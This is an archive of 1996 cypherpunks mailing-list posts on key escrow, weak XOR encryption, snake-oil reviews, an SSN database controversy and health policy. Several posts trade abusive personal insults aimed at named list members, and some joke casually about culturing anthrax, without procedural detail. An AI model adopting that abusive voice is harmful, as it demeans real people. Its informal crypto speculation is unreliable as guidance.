Wed Sep 18 10:56:40 1996 From: adam at homeport.org (Adam Shostack) Date: Thu, 19 Sep 1996 01:56:40 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: <199609181448.JAA01172@homeport.org> Lucky Green wrote: | On Wed, 18 Sep 1996, Steve Schear wrote: | > It seems that in order for this to work Net consumers must be | > convinced/coerced into accepting the GAK security features. What if, due | > to a grassroots uprising, Neters refuse to use products which require GAK | > or Net services which will only operate via GAK? Isn't there an great | > opportunity being created for S/Wan, Apache and its ilk and third-party | > (especially off-shore, non-COCOM, produced) security plug-ins? | | Simple. Incentivize sites/server/payment system manufacturers to require | certs from their users. This is already underway. See SET. Then make sure | that the certs/keys are GAK'ed. Yes, I know there is a difference between | certs and keys. Joe User doesn't. Neither does the media. It is a two step | process. The problem with GAK in financial systems is that it makes your non-repudiation repudiable. It also opens you to the CIA using your bank to finance a revolution in Central America. Think of it as a revolutionary tax. ;) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jbugden at smtplink.alis.ca Wed Sep 18 11:12:48 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Thu, 19 Sep 1996 02:12:48 +0800 Subject: Cognitive Bias and Software Development Message-ID: <9608188430.AA843065026@smtplink.alis.ca> This reference was chopped from the bottom of a previous message. Communications of the ACM issue on Cognition and Software Development "Developers' thought processes are a fundamental area of concern. Cognitive scientists have discovered that people's intuitive inferences and probability judgments do not strictly conform to the laws of logic or mathematics, and that people are willing to provide plausible explanations for random events. This article examines the role these phenomenon might have in software development, ultimately concluding that what are cast as one-sided software development guidelines can be recast beneficially as two-sided trade-offs" Cognitive Bias in Software Engineering Webb Stacy and Jean MacMillian Communications of the ACM June 1995/Vol 38, No. 6 The article contains several good example of various classes of bias, including the representativeness, availability and confirmatory bias. While the article specifically adresses issues within the context of software development, all of these biases are general in nature and have correlates in other fields. Ciao, James Great minds think alike. Fools seldom differ. - Anonymous From cmefford at avwashington.com Wed Sep 18 12:10:23 1996 From: cmefford at avwashington.com (Chip Mefford) Date: Thu, 19 Sep 1996 03:10:23 +0800 Subject: cypherpunk listserve usefulness Message-ID: As much as it shames me, I have recently discovered that by filtering messages from only 2 participants and setting body filters on 3 keywords have remarkably improved the usefulness of this listserve. As much as I do enjoy some of the filtered subject matter, I really feel it is very off subject and makes this listserver useless for the intended task. I guess that makes me a censor and it has me reexamining some things. From varange at crl.com Wed Sep 18 13:07:37 1996 From: varange at crl.com (Troy Varange) Date: Thu, 19 Sep 1996 04:07:37 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: Message-ID: <199609181415.AA21481@crl11.crl.com> > tcmay at got.net (Timmy May) (fart) writes: > > * Detweiler (vznuri at netcom.com) writes: > > Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy > believes his own lies. > > > (Sadly, a large fraction of the women who have posted on our list have > > written in this same kind of incoherent, rambling, makes-no-sense kind of > > style. I have no idea why the percentage of such events is so high.) > > Is Timmy gay? Why does he hate women so much? > > > * And of course Vulis has been posting his "farting" messages far and wide. > > Recently, 3 people in the computer security field have independently > told me that Timmy May approached them "off-list" to complain about > things I supposedly say on the Internet - most of which I never said. > When I asked about it on this mailing list, Timmy posted what was shown > to be a lie (about his complaint to Kelly Goen.) Timmy is known as a > nutcase and a liar - if he keeps up his "character assassination" > attacks, the only reputation he hurts is his own. > > Dr.Dimitri Vulis KOTM Fuckhead. From frantz at netcom.com Wed Sep 18 13:20:17 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 19 Sep 1996 04:20:17 +0800 Subject: Fear of Flying -- from HotWired Message-ID: <199609181446.HAA10952@netcom8.netcom.com> At 1:21 AM 9/18/96 -0400, Black Unicorn wrote: >> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: >> >Gee, biotech has come a long way. Now I can download the Anthrax DNA >> >sequence from the net and insert it in some carrier bacteria and start >> >making Anthrax bacteria. Neat! > >Culturing and growing anthrax is painfully simple. No DNA required. Sorry Unicorn, you missed my point. (1) You need DNA to grow bacteria. You can get the DNA two ways. (A) You get a sample of the beast, or (B) You get a DNA sequence and then regenerate the DNA. (I don't think B is technically feasable yet.) (2) You can't send samples of the beast thru the net. ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From frissell at panix.com Wed Sep 18 13:23:03 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 19 Sep 1996 04:23:03 +0800 Subject: Spam blacklist project Message-ID: <3.0b19.32.19960918112541.00a0bc48@panix.com> hallam at ai.mit.edu writes: > Well if some people find it amazing that there are people out there > who agree with the 98.8% of people who did not vote Libertarian at the > last election then so be it. Course half the eligible population didn't vote at all obviously favoring market and personal approaches over political methods of governance. DCF From shamrock at netcom.com Wed Sep 18 13:28:37 1996 From: shamrock at netcom.com (Lucky Green) Date: Thu, 19 Sep 1996 04:28:37 +0800 Subject: The GAK Momentum is Building... In-Reply-To: <199609181251.IAA118254@osceola.gate.net> Message-ID: On Wed, 18 Sep 1996, Jim Ray wrote: > I agree, and hope so. "Key Recovery," while not as Orwellian-sounding as > "GAK," is a step on the path to honesty WRT the English language, though > it's important to continually point out, as Tim did in his post, that > *access* -- rather than just recovery -- is obviously what Mr. Freeh wants. > > I'd count this likely change in terminology as a "cypherpunk victory," > albeit a very small and certainly a very hard-fought one. Nope. It is a Cypherpunk loss. The use of the term "key recovery" for GAK now fully obfuscates the distinction between accessing a backup copy by the legitimate owner (or his estate, employer, etc.) and GAK. Many PKIs will support the former type of key recovery. And for good reasons. Thanks to the brainwashers using the same term for GAK, it will now become impossible to tell from a basic description of a PKI if it supports GAK or not. Furthermore, those who oppose the latter type of key recovery (us!), will be pushed further into the fringe by the media now being able to mix up our arguments against GAK with arguing against true key recovery. [Do you notice the weird constructs I have to use to distinguish the two meanings? One of them being new...] --Lucky From sandfort at crl.com Wed Sep 18 13:31:10 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 19 Sep 1996 04:31:10 +0800 Subject: A daily warning regarding Timothy C. May In-Reply-To: <199609180341.FAA02454@basement.replay.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Wed, 18 Sep 1996, Anonymous wrote: > Timothy C. May is a lying sack of shit. I've never known Tim to lie. As to the rest, Tim has always been above reproach in his personal hygiene. There is a smell here, but it comes from anonymous who is obviously a sad, pathetic loser. Back under your rock, anonymous. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From geeman at best.com Wed Sep 18 13:53:26 1996 From: geeman at best.com (geeman at best.com) Date: Thu, 19 Sep 1996 04:53:26 +0800 Subject: Redundancy in XOR encryption Message-ID: <01BBA53A.2B7FC2A0@geeman.vip.best.com> in any practical or semi-practical application, you'll have to have a way to decompress the perfectly compressed data. A dictionary? A Huffman-tree-ish sort of thing? Are you going to transfer it out-of-band? **It** becomes the target of interest. ---------- From: paul at fatmans.demon.co.uk[SMTP:paul at fatmans.demon.co.uk] Sent: Tuesday, September 17, 1996 12:33 PM To: cypherpunks at toad.com Subject: Re: Redundancy in XOR encryption > > > > Compress P to get perfect compression (ie. 0 redundancy) > > Encrypt F (the compressed text) using a repeated key XOR > > > > of course this is all rather theoretical as there is no such thing as > > perfect compression, but I just thought it might be interesting to > > see if this is indeed strong, superficially it appears so to me... > > > > Paul: > I think that if the cryptanalyst knows that F has zero redundancy > that he can run searches from 0 to n bits for the key and have > the computer flag solutions that have zero redundancy. I never though of that. > I also think that a perfectly compressed file would have a relative > entropy value close to one also, hence the computer could flag possibles > that have both characteristics. yeah, these two are reasonably unlikely to occur together (only a reasoned guess, anyone got any comments on this?) so we really have a weakish system. > Hence, instead of searching for plaintext by counting coincidences, > we are searching the decrypts for solutions that have zero redundancy > and a relative entropy value close to one. How many solutions will > have both these qualities? I don't know. But if the compression method > is known, brute force will be tried, and only having to try to > decompress (read) data that has the resultant characteristics > of compressed information will speed things up by quite a bit. Yeah, this is still a form of brute force but I was thinking of this in terms of a smallish (sub 200 bit) key, so brute force against solutions with 0 entropy is a realistic possibility. From wendigo at pobox.com Wed Sep 18 13:59:13 1996 From: wendigo at pobox.com (Mark Rogaski) Date: Thu, 19 Sep 1996 04:59:13 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu> Message-ID: <199609181500.LAA08399@charon.gti.net> -----BEGIN PGP SIGNED MESSAGE----- An entity claiming to be Krenn wrote: : : It would be nice to have a list of actual products which are deemed : potential snake-oil. Such a list could be maintained anonymously : through a nym to avoid all the annoying legal problems with commenting : on another's product. Though truth is the best defense against libel : charges, it would be very annoying to be sued or some such by some : hairbrained snake-oil peddler. : I think a blacklist of that sort is inherently bad. I would much rather have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than just be spoon fed a list of good products vs. bad products. Pardon the cliche, but if you give a man a fish ... etc, etc. mark - -- Mark Rogaski | Why read when you can just sit and | Member GTI System Admin | stare at things? | Programmers Local wendigo at gti.net | Any expressed opinions are my own | # 0xfffe wendigo at pobox.com | unless they can get me in trouble. | APL-CPIO -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMkAOhBz4pZwIaHjdAQEe9wf8D2Dhp1vcv1W4aOiugeNrJTp7FoDIb3yo 62sq44c/vlBX/Ph6InrHP6zHIKG1gx6ipt1NLXGWDZV0hWGrn9Eu7dIATqHjoyoM 9oFK8c00Rlg63o/FVl2XUHovfbPolqOBX24MRngqrsyWdOyqdShSwVPTH5ZBUj5I Pxp4BWjcjYqkfF7nKXaWitJs2wjaM4yYQ57UIe1Hm/SLLL2erxNfrveWN1VwrdyO N3QIuHfPWM3yi+UUJTOybOKLp+j07bgs+mLr2MT9JmYYrYZwtTEwLD4a6oueUZpN LLWaIS8vekEy7HSzhG7sPfo35v/aaKKWs739af3UgLd3HUdzmVvfgw== =YK3C -----END PGP SIGNATURE----- From jbugden at smtplink.alis.ca Wed Sep 18 14:02:23 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Thu, 19 Sep 1996 05:02:23 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <9608188430.AA843068299@smtplink.alis.ca> snow wrote: > Actually, don't some wealthy Canucks come south of the border for > certain treatments unavailable in the Great White North? Yes, some wealthy (and not so wealthy people) go south of the border for treatment. Some go because the treatment is unavailable here, others go if they chose not to wait for treatment here. The most common types of exported services are usually high cost and/or experimental but their availability is most often constrained by the low number of people who are qualified to render the service. Many services unavailable in a patient's local area are still covered by provincial health plans. This works when a patient has to travel from a remote region, to another province or to the U.S., and can cover experimental treatments. Some Canadian hospitals make use of U.S. care providers for services when a backlog exists in Canada. For example, Windsor has used Detroit MRI services to reduce waiting times. There are also people who go the other way (U.S. to Canada), usually when they have to pay their own bill. Detroit to Windsor is again not uncommon. > Are the PRICES as high in Canada as here? In general, prices are lower in Canada for the same level of care. I do not know if the underlying costs are also lower in general. Each province create a payment schedule for services that it reimburses. Hospitals bill the province for services, but all capital cost items (e.g. equipment, buildings) must be paid for from other sources (e.g. donation). Thus, we tend to have fewer capital intensive treatment facilities since the ROI is usually low. The figures that I have seen indicate that the U.S. pays 40%-50% more than Canada on overall health care services. Some of this is due to the rapid availability of higher cost/experimental services. Some of this is due to the higher cost of the administrative bureacracy. Due to the large difference in total costs, I do not think that travel in either direction significantly effects this number. Ciao, James Check out www.spinex.com for more effective alternatives to MRI for diagnosing spinal function at 1/20th of the cost. P.S. No, Canada is not perfect, and I don't know everything. From sandfort at crl.com Wed Sep 18 14:02:50 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 19 Sep 1996 05:02:50 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Like Tim, I'm a little surprised at all the stupid name calling on the list lately. On Wed, 18 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > I don't think Timmy believes his own lies. Again, I don't believe Tim lies, the good doctor's assertions to the contrary not withstanding. > Is Timmy gay? You should have seen the babe Tim was with at my party. Where do folks come up with this nonsense? > Timmy is known as a nutcase and a liar - if he keeps up his > "character assassination" attacks, the only reputation he hurts > is his own. Yeah, that's the way reputation works, but the gun is definitely pointed in the other direction. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From f_estema at alcor.concordia.ca Wed Sep 18 14:03:05 1996 From: f_estema at alcor.concordia.ca (f_estema at alcor.concordia.ca) Date: Thu, 19 Sep 1996 05:03:05 +0800 Subject: [joke, non-code] Re: Get this for a snake-oil example :) In-Reply-To: <2.2.32.19960918083303.00750b3c@healey.com.au> Message-ID: On Wed, 18 Sep 1996, Benjamin Grosman wrote on coderpunks: > Hey there...thought I'd drop this in to you... > someone I know is in the process of being set upon by a shamster (well, ^^^^^^^^ Shamster: SHA-enabled biocomputing hamster. Distantly related to Shneier's DESosaurus. Cute, cuddly and mathematically secure and authentic. I leave to the imagination its input and output processes. Eats snake oil for lunch. From tcmay at got.net Wed Sep 18 14:06:09 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 05:06:09 +0800 Subject: The GAK Momentum is Building... Message-ID: At 12:49 PM 9/18/96, Declan McCullagh wrote: >On Tue, 17 Sep 1996, Timothy C. May wrote: >> >> (BTW, I predict that the tainted term "key escrow" is now gone from the >> official lexicon. I haven't seen the Clipper IV proposal, but I surmise >> that the baggage the term "key escrow" carries means that some more >> benign-sounding term will be used in the final proposal. Something like >> "Key Recovery System." You heard it here.) > >I agree, of course. But Gore's office has been telling me about the "Key >Recovery System" for months. It's nothing new in the DC cryptolexicon. Yeah, I shouldn't have added the "You heard it here" line, implying I had invented the term. As others have noted, this seems to be the new term for key escrow. The brainwashing must've taken hold on me, and as a good citizen-unit I had absorbed the message: "Key Recovery is Security, Ignorance is Strength." --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From attila at primenet.com Wed Sep 18 14:37:41 1996 From: attila at primenet.com (attila) Date: Thu, 19 Sep 1996 05:37:41 +0800 Subject: Nobody@replay: childish foul [WAS: A daily warning regarding Timothy May] In-Reply-To: <199609180341.FAA02454@basement.replay.com> Message-ID: <199609181456.IAA16990@InfoWest.COM> In <199609180341.FAA02454 at basement.replay.com>, on 09/18/96 at 05:41 AM, nobody at replay.com (Anonymous) said: = .Timothy C. May is a lying sack of shit. OK, children, particularly nobody at replay.com --this is going too far. THERE IS NO EXCUSE FOR DIRECT ATTACKS ON TCMAY OR ANYONE ELSE. We all pick on someone occasionally, which is acceptable, but "A daily warning regarding Timothy May" as above will (or already is) the death knell of cypherpunks. if you are going to be that personal, drop your immature mask, attend a SF cypherpunks meeting, find Tim and tell him to his face: "Timothy C. May is a lying sack of shit," try to punch Tim in the nose before he punches you, and let the chips fall where they fall. At least you will be a man, not "A lying sack of coward." I don't always agree with Tim, but Tim makes me think about it. Cypherpunks was supposedly founded to promulgate _discussion_ of cryptography and related issues of Bill of Rights as it pertains to cryptographical freedom, and the freedom of speech. this list is a political free-for-all; it can be rough around the edges with individual egos and sarcasm, but there is no justification for direct attacks without provocation or reason. nobody at replay has contributed to the list; but if the contr- ibutions are to be vitriolic and childish attacks, /dev/null awaits with open arms. From jt at freenix.fr Wed Sep 18 14:42:39 1996 From: jt at freenix.fr (Jerome Thorel) Date: Thu, 19 Sep 1996 05:42:39 +0800 Subject: Cryptologie: Conference internationale - 25 SEPT - Paris Message-ID: (message sent to interesting persons - bcc: field) Conference The Public Voice and the Development of International Encryption Policy Sponsored by Electronic Privacy Information Center Global Internet Liberty Campaign Internet Privacy Coaltion Open Society Institute - Soros Foundation Planete Internet September 25, 1996 Centre de Conf�rence Internationale 19 Avenue Kleber, Paris 16, France Program, registration and further information (English): http://www.epic.org/events/crypto_paris Or (French) http://www.netpress.fr/crypto PARIS, September 16 � The international developement of the Internet leads governments, users organisations and corporations to find a compromise for the use and disposal of encryption, which allows to keep the secrecy of digital communications. Governments want to keep the possibility to intervene on communications in order to fight computer crime. The industry (private companies) search a way to keep an eye on their communications' integrity not to erode their competitivity. And privacy organisations want to preserve citizens' privacy and freedom of speech in expression networks such as the Internet. Before a meeting of governmental experts (under the auspices of the OECD Sept 26, 27 in Paris), the Electronic Privacy Information Center, a Washington, DC-based organisation, asked scientists, international right jurists and associations to meet on September 25 for a conference. The conference will stresses on legal aspects of computer-based secrecy, based on propositions made by some countris to create a regime of "encryption under conditions" (encryption under control), on the Trusted Third Party Services (TTP) scheme. Companies that will keep encryption keys of corporations and individuals would have to keep them at disposition of law enforcement authorities. Who will play this TTP role? Which garanty for end users? EPIC asked the world's most valuable experts to answer these questions. PROGRAM SUMMARY find the whole and last one at http://www.epic.org/events/crypto_paris/schedule.html Cryptographers: Zimmermann (PGP Inc), Diffie (Sun, pub-key system inventor), Anderson (Cambridge U., UK), Blaze (Bell Lab), etc. Scientists and experts: Horibe (Hitotsubashi U.), Carpenter (IAB), Simons (ACM), etc. Privacy advocates from EPIC (Rotenberg, Banisar), ACLU (Steinhardt), Privacy International (Davies), and French League for Human Rights. Officials and/or governmental experts from : OECE crypto & security ad hox commissions, Attorney General Dept and High Court (Australia), Economic Ministry (Germany), Austrian Law Institute, etc. CONTACTS FOR INFO & REGISTRATIONS � USA: EPIC: Mark Rotenberg , Dave Banisar . 666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003. +1 202 544 9240 (tel), +1 202 547 5482 (fax) � FRANCE Planete Internet (Net Press), Paris: Xavier Cany , Jerome Thorel . 191 Av. Aristide Briand, F-94230 Cachan. +33 1 49 08 58 33 (tel), +33 1 49 08 58 31 (fax). Jerome Thorel * Planete Internet Journaliste / ID#72052 * Editor / Redak chef 191 Av. A. Briand * Tel : (331) 49085830 94230 CACHAN * web : www.netpress.fr From byrd at acm.org Wed Sep 18 14:46:52 1996 From: byrd at acm.org (Jim Byrd) Date: Thu, 19 Sep 1996 05:46:52 +0800 Subject: SSN database scam? Message-ID: <2.2.32.19960918141242.006e9b48@super.zippo.com> At 01:22 PM 9/18/96 +0200, Gary Howland forwarded: >Forwarded from www-security mailing list. [snip] >Can anybody comment on the item forwarded below my sig file? It claims >there's a database w/ people's credit card no's etc on it and you have to >give your name and social security number to get off of it. This strikes >me as being a scam to get your ssn, but this went around at work and >people are actually calling and giving it out. I know ssn's aren't really >as secure as they're supposed to be, but still... I happen to work for Lexis-Nexis, but I don't speak for the company. Yes, P-Trak is real, it was recently made available to our customers. It is NOT a scam to get SSNs. Lexis-Nexis is a large and reputable company, best-known for its huge legal database system, Lexis. The Nexis side has news reports from a large variety of sources. P-Trak originally made SSNs available, but Lexis-Nexis removed this feature in response to protests. From bmcarpenter at trevecca.edu Wed Sep 18 15:03:56 1996 From: bmcarpenter at trevecca.edu (Myers W. Carpenter) Date: Thu, 19 Sep 1996 06:03:56 +0800 Subject: Macintosh Mixmaster port... Who's doing it? Message-ID: Does anyone have any idea who might be attempting a Macintosh Mixmaster port? I and some other people were eyeing the idea. If you know who might be doing this port I would appreciate hearing from them. Thanks. myers From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 18 15:03:56 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 19 Sep 1996 06:03:56 +0800 Subject: The Near-Necessity of Health Insurance Message-ID: <01I9MKL4PCX48Y4YUZ@mbcl.rutgers.edu> From: IN%"tcmay at got.net" 18-SEP-1996 02:54:27.36 >Personally, I have not been a patient in a hospital in my entire adult >life. Nor have I seen a doctor, except for a mandatory college physical in >1970 and an insurance company physical in 1977. I just haven't broken any >bones, had any serious illnesses, or felt the need to visit a doctor, an >emergency room, or a walk-in clinic of any sort. I suppose I've been lucky. >Also, I dislike hospitals and avoid doctors unless there seems to be a >compelling need. So far, there has not been. While this is certainly your business, I would suggest at least one physical a year, including blood work, as a good preventative measure... I believe it _has_ been shown to extend lives; I can do a Medline lookup if desired. >In other words, the person who insures himself (through savings and >investments) and who offers to pay for treatment out of his own funds, may >be at a serious disadvantage. He pays the inflated rates for services, and >may face delays in being admitted to a hospital. [...] >(Obviously the folks who use their insurance routinely, as one of my >engineers once used to do (he'd take his kids to the hospital every time >they sneezed), are being subsidized by those of us who avoid hospitals at >all costs.) Actually, the major subsidy appears to be that employer-paid health insurance isn't a taxable benefit. The status regarding self-insured persons such as you is constantly changing, but they're looking at subsidizing that also. Essentially, taxes paid by those with low or no employer-paid health insurance are subsidizing those with high-cost employer-paid health insurance. -Allen From Adamsc at io-online.com Wed Sep 18 15:08:25 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 06:08:25 +0800 Subject: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ] Message-ID: <19960918180841187.AAA221@IO-ONLINE.COM> On Tue, 17 Sep 1996 17:14:53 -0400, Mike Fletcher wrote: >>>Gee, biotech has come a long way. Now I can download the Anthrax DNA >>>sequence from the net and insert it in some carrier bacteria and start >>>making Anthrax bacteria. Neat! >> Now the bad news: the DNA replicator only works under Windows 95 and comes >> with buggy drivers! > Buggy drivers? But isn't that the point in this case? :) True, true... And you *really* don't want to see what happens when it crashes! >> Unfortunately, it can be very deadly. The idea here is that it rarely infect >s >> humans - in the normal course of events. If a determined biowarrior is tryin >g >> to infect people, all bets are off. > > The Frank Herbert (of _Dune_ fame) book _White Plague_ comes >to mind. Basically a molecluar biologist's wife and kids are killed >by an IRA bomb while visiting Dublin. He snaps and creates a plague >which kills women (men are carriers) as revenge. All without using >that nasty Internet (in fact, the book was written back before even >ARPAnet). I remember reading this one. Very applicable! # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From droelke at rdxsunhost.aud.alcatel.com Wed Sep 18 15:11:58 1996 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Thu, 19 Sep 1996 06:11:58 +0800 Subject: Snake-Oil FAQ Message-ID: <9609181827.AA20470@spirit.aud.alcatel.com> Dale Thorn wrote: > > Krenn wrote: > > It would be nice to have a list of actual products which are deemed > > potential snake-oil. Such a list could be maintained anonymously > > through a nym to avoid all the annoying legal problems with commenting > > on another's product. Though truth is the best defense against libel > > charges, it would be very annoying to be sued or some such by some > > hairbrained snake-oil peddler. > > Think how much more annoying it would be if the shoe were on the other > foot. > Libel/Slander is very different from doing a review. Unfortunately, in todays legal climate, it is way to easy to find a lawyer that will harass someone for a negative review. Unless you are prepared to fight such a legal battle, it is much easier to do anonymous reviews, and build up a reputation as a good reviewer through use of signatures, etc. If you have a good product, and get negative reviews, the truth will come out eventually through other channels. Either the product really isn't good, or the reviewer loses his reputation and his messages descend into the noise. Thats life - deal with it! Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From byrd at ACM.ORG Wed Sep 18 15:14:11 1996 From: byrd at ACM.ORG (Jim Byrd) Date: Thu, 19 Sep 1996 06:14:11 +0800 Subject: SSN database scam? Message-ID: <2.2.32.19960918181651.00706174@super.zippo.com> One thing people forget is that Lexis-Nexis is hardly the first company to offer this kind of service. Several years ago, there was a controversy when Lotus planned to offer this kind of information on CD-ROM. The main competition of Lexis-Nexis, West Publishing Company ("Westlaw"), offered this kind of service before Lexis did. The last I heard, it was possible to get SSNs via Westlaw. I don't know if this is still true. I checked with a friend of mine, and got this response: "Westlaw offers access to several databases (including its PEOPLE-CB and INFOAM databases). They provide a person's "Credit Bureau Header," which contains social security number, previous address(s), telephone number(s), spouse name, date of birth, related names/aliases, and the date the report was filed." I happen to work for Lexis-Nexis, but I don't speak for the company. I work in a very different part of the company, and don't know the people involved with P-Trak. From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 18 15:19:38 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 19 Sep 1996 06:19:38 +0800 Subject: Edited Edupage, 17 Sept 1996 Message-ID: <01I9MKS1EDY68Y4YUZ@mbcl.rutgers.edu> From: IN%"educom at educom.unc.edu" 18-SEP-1996 05:39:23.00 >************************************************************ >Edupage, 17 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. >************************************************************ >THE BOTTOM LINE ON ELECTRONIC LIBRARIES >A former Public Library Association official estimates the cost of wiring >the nation's libraries at somewhere between $2- and $3-billion -- "a sum >nearly equivalent to that spent by the philanthropist Andrew Carnegie during >the great spurt of library building," notes journalist Nicholas von Hoffman. >But, "being able to afford the hardware is one thing," says a senior VP of >New York Public Library's Research Libraries. "Being able to replace it >year after year and being able to afford the staff to help people use it is >another. We could put workstations everywhere, but we don't have enough >staff. The equipment is on a three-year, six-thousand-dollar replacement >cycle. If people are using things like the World Wide Web, we need one >staff member out on the floor for every 20 workstations in use... Right now >we have 250 workstations for the public, so one staff member for every 20 >workstations becomes a major investment." (Architectural Digest Oct 96 p130) I would suspect that one of the following will take place: A. Libraries will not wind up getting Internet access subsidized to any great extent, since they can't afford to pay for the rest of it. B. Libraries will get Internet access subsidized, but won't be able to use it a lot so the subsidy may eventually go by the wayside due to lack of political support. C. Libraries will get everything subsidized. -Allen >Edupage is written by John Gehl & Suzanne Douglas >. Voice: 404-371-1853, Fax: 404-371-8057. >Technical support is provided by Information Technology Services at the >University of North Carolina at Chapel Hill. >************************************************************ >Edupage ... is what you've just finished reading. To subscribe to Edupage: >send mail to: listproc at educom.unc.edu with the message: subscribe edupage >John McCarthy (if your name is John McCarthy; otherwise, substitute your >own name). ... To cancel, send a message to: listproc at educom.unc.edu with >the message: unsubscribe edupage. (If you have subscription problems, send >mail to manager at educom.unc.edu.) From jlv at signet.sig.bsh.com Wed Sep 18 15:26:52 1996 From: jlv at signet.sig.bsh.com (Jason Vagner) Date: Thu, 19 Sep 1996 06:26:52 +0800 Subject: Wealth Tax vs. Capital Gains Tax Reduction In-Reply-To: Message-ID: On Tue, 17 Sep 1996, Timothy C. May wrote: > > I've been thinking a lot about the prospects of a "wealth tax," or "asset > tax," in the U.S. With the stock market averages at record levels (and, > hey, Intel has gone up $6 just so far today, to an unheard of $94.5 level), > and with increasing fractions of people's overall net worth tied up in > equities, bonds, houses, property, etc., it may be that the looters will > take a more serious look at taxing people's overall wealth, e.g., the 5% of > net worth per year that some countries have. Forgive me if this is a stupid question, but could this lead to "engineering" the market at particularly times of the year to decrease the "official" value of an entity's value and complicating the pricing of equities? Would this become a viable means for those with less wealth to capitalize on the momentary "dip" in prices? jlv From ericm at lne.com Wed Sep 18 15:41:34 1996 From: ericm at lne.com (Eric Murray) Date: Thu, 19 Sep 1996 06:41:34 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: <199609181415.AA21481@crl11.crl.com> Message-ID: <199609181553.IAA28096@slack.lne.com> Troy Varange writes: > > > tcmay at got.net (Timmy May) (fart) writes: > > > * Detweiler (vznuri at netcom.com) writes: [spew from "Dr.Dimitri Vulis" deleted] > Fuckhead. If you think someone's a fuckhead, please just put them in your KILL file and get on with your life. You don't need to announce your discovery to the rest of the group- we either agree with you (and have killifiled the fuckhead) or we don't agree that he's a fuckhead. Your announcement will sway no one's opinion. All it does is add to the noise. Thanks. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From perry at piermont.com Wed Sep 18 15:44:01 1996 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 19 Sep 1996 06:44:01 +0800 Subject: XPA_nix In-Reply-To: Message-ID: <199609181622.MAA14053@jekyll.piermont.com> "" writes: > > On Thu, 12 Sep 1996, John Young wrote: > > > Cheswick opines,"This is the first major attack of a kind that I believe to > > be the final Internet security problem." > > Harrumph. We should only BE so lucky. I don't remember if Ches was quoted correctly, but its more or less true -- we know how to deal with most classes of major problems, but denial of service is still a major question mark. I suspect its the last big frontier. Perry From unicorn at schloss.li Wed Sep 18 15:47:43 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 19 Sep 1996 06:47:43 +0800 Subject: Fear of Flying -- from HotWired In-Reply-To: <199609181446.HAA10952@netcom8.netcom.com> Message-ID: On Wed, 18 Sep 1996, Bill Frantz wrote: > At 1:21 AM 9/18/96 -0400, Black Unicorn wrote: > >> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: > >> >Gee, biotech has come a long way. Now I can download the Anthrax DNA > >> >sequence from the net and insert it in some carrier bacteria and start > >> >making Anthrax bacteria. Neat! > > > >Culturing and growing anthrax is painfully simple. No DNA required. > > Sorry Unicorn, you missed my point. (1) 